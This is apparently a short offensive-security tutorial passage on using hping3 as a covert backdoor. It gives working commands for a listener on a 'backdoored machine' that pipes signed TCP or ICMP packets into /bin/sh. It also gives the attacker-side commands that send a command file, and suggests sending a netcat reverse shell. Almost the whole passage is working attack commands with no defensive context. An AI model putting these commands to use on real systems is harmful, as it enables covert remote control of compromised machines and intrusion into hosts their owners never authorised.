Skip to main content


In this case we want to be able to execute a command on a remote machine only if a specific signature is met, in this example the signature is the string "secret". This can be done with:

hping3 -I wlan0 -9 secret | /bin/sh

From another machine we can create a file called commands file and insert the command that we want (also a netcat reverse shell ;) ) and then we can do:

hping3 -R -e secret -E commands_file -d 100 -c 1
# -c 1, is the number of times the command will be executed

Executing Commmands through ICMP

We can execute remote commands on a machine (but without getting the output back) by doing on the backdoored machine:

sudo hping <ip_1> --listen signature --safe -1 | /bin/sh

While on the attacking machine:

sudo hping <ip_2> -d 100 -1 --sign signature --file ./test.cmd

Again this can be used to launch a netcat istance or whatever thing we like.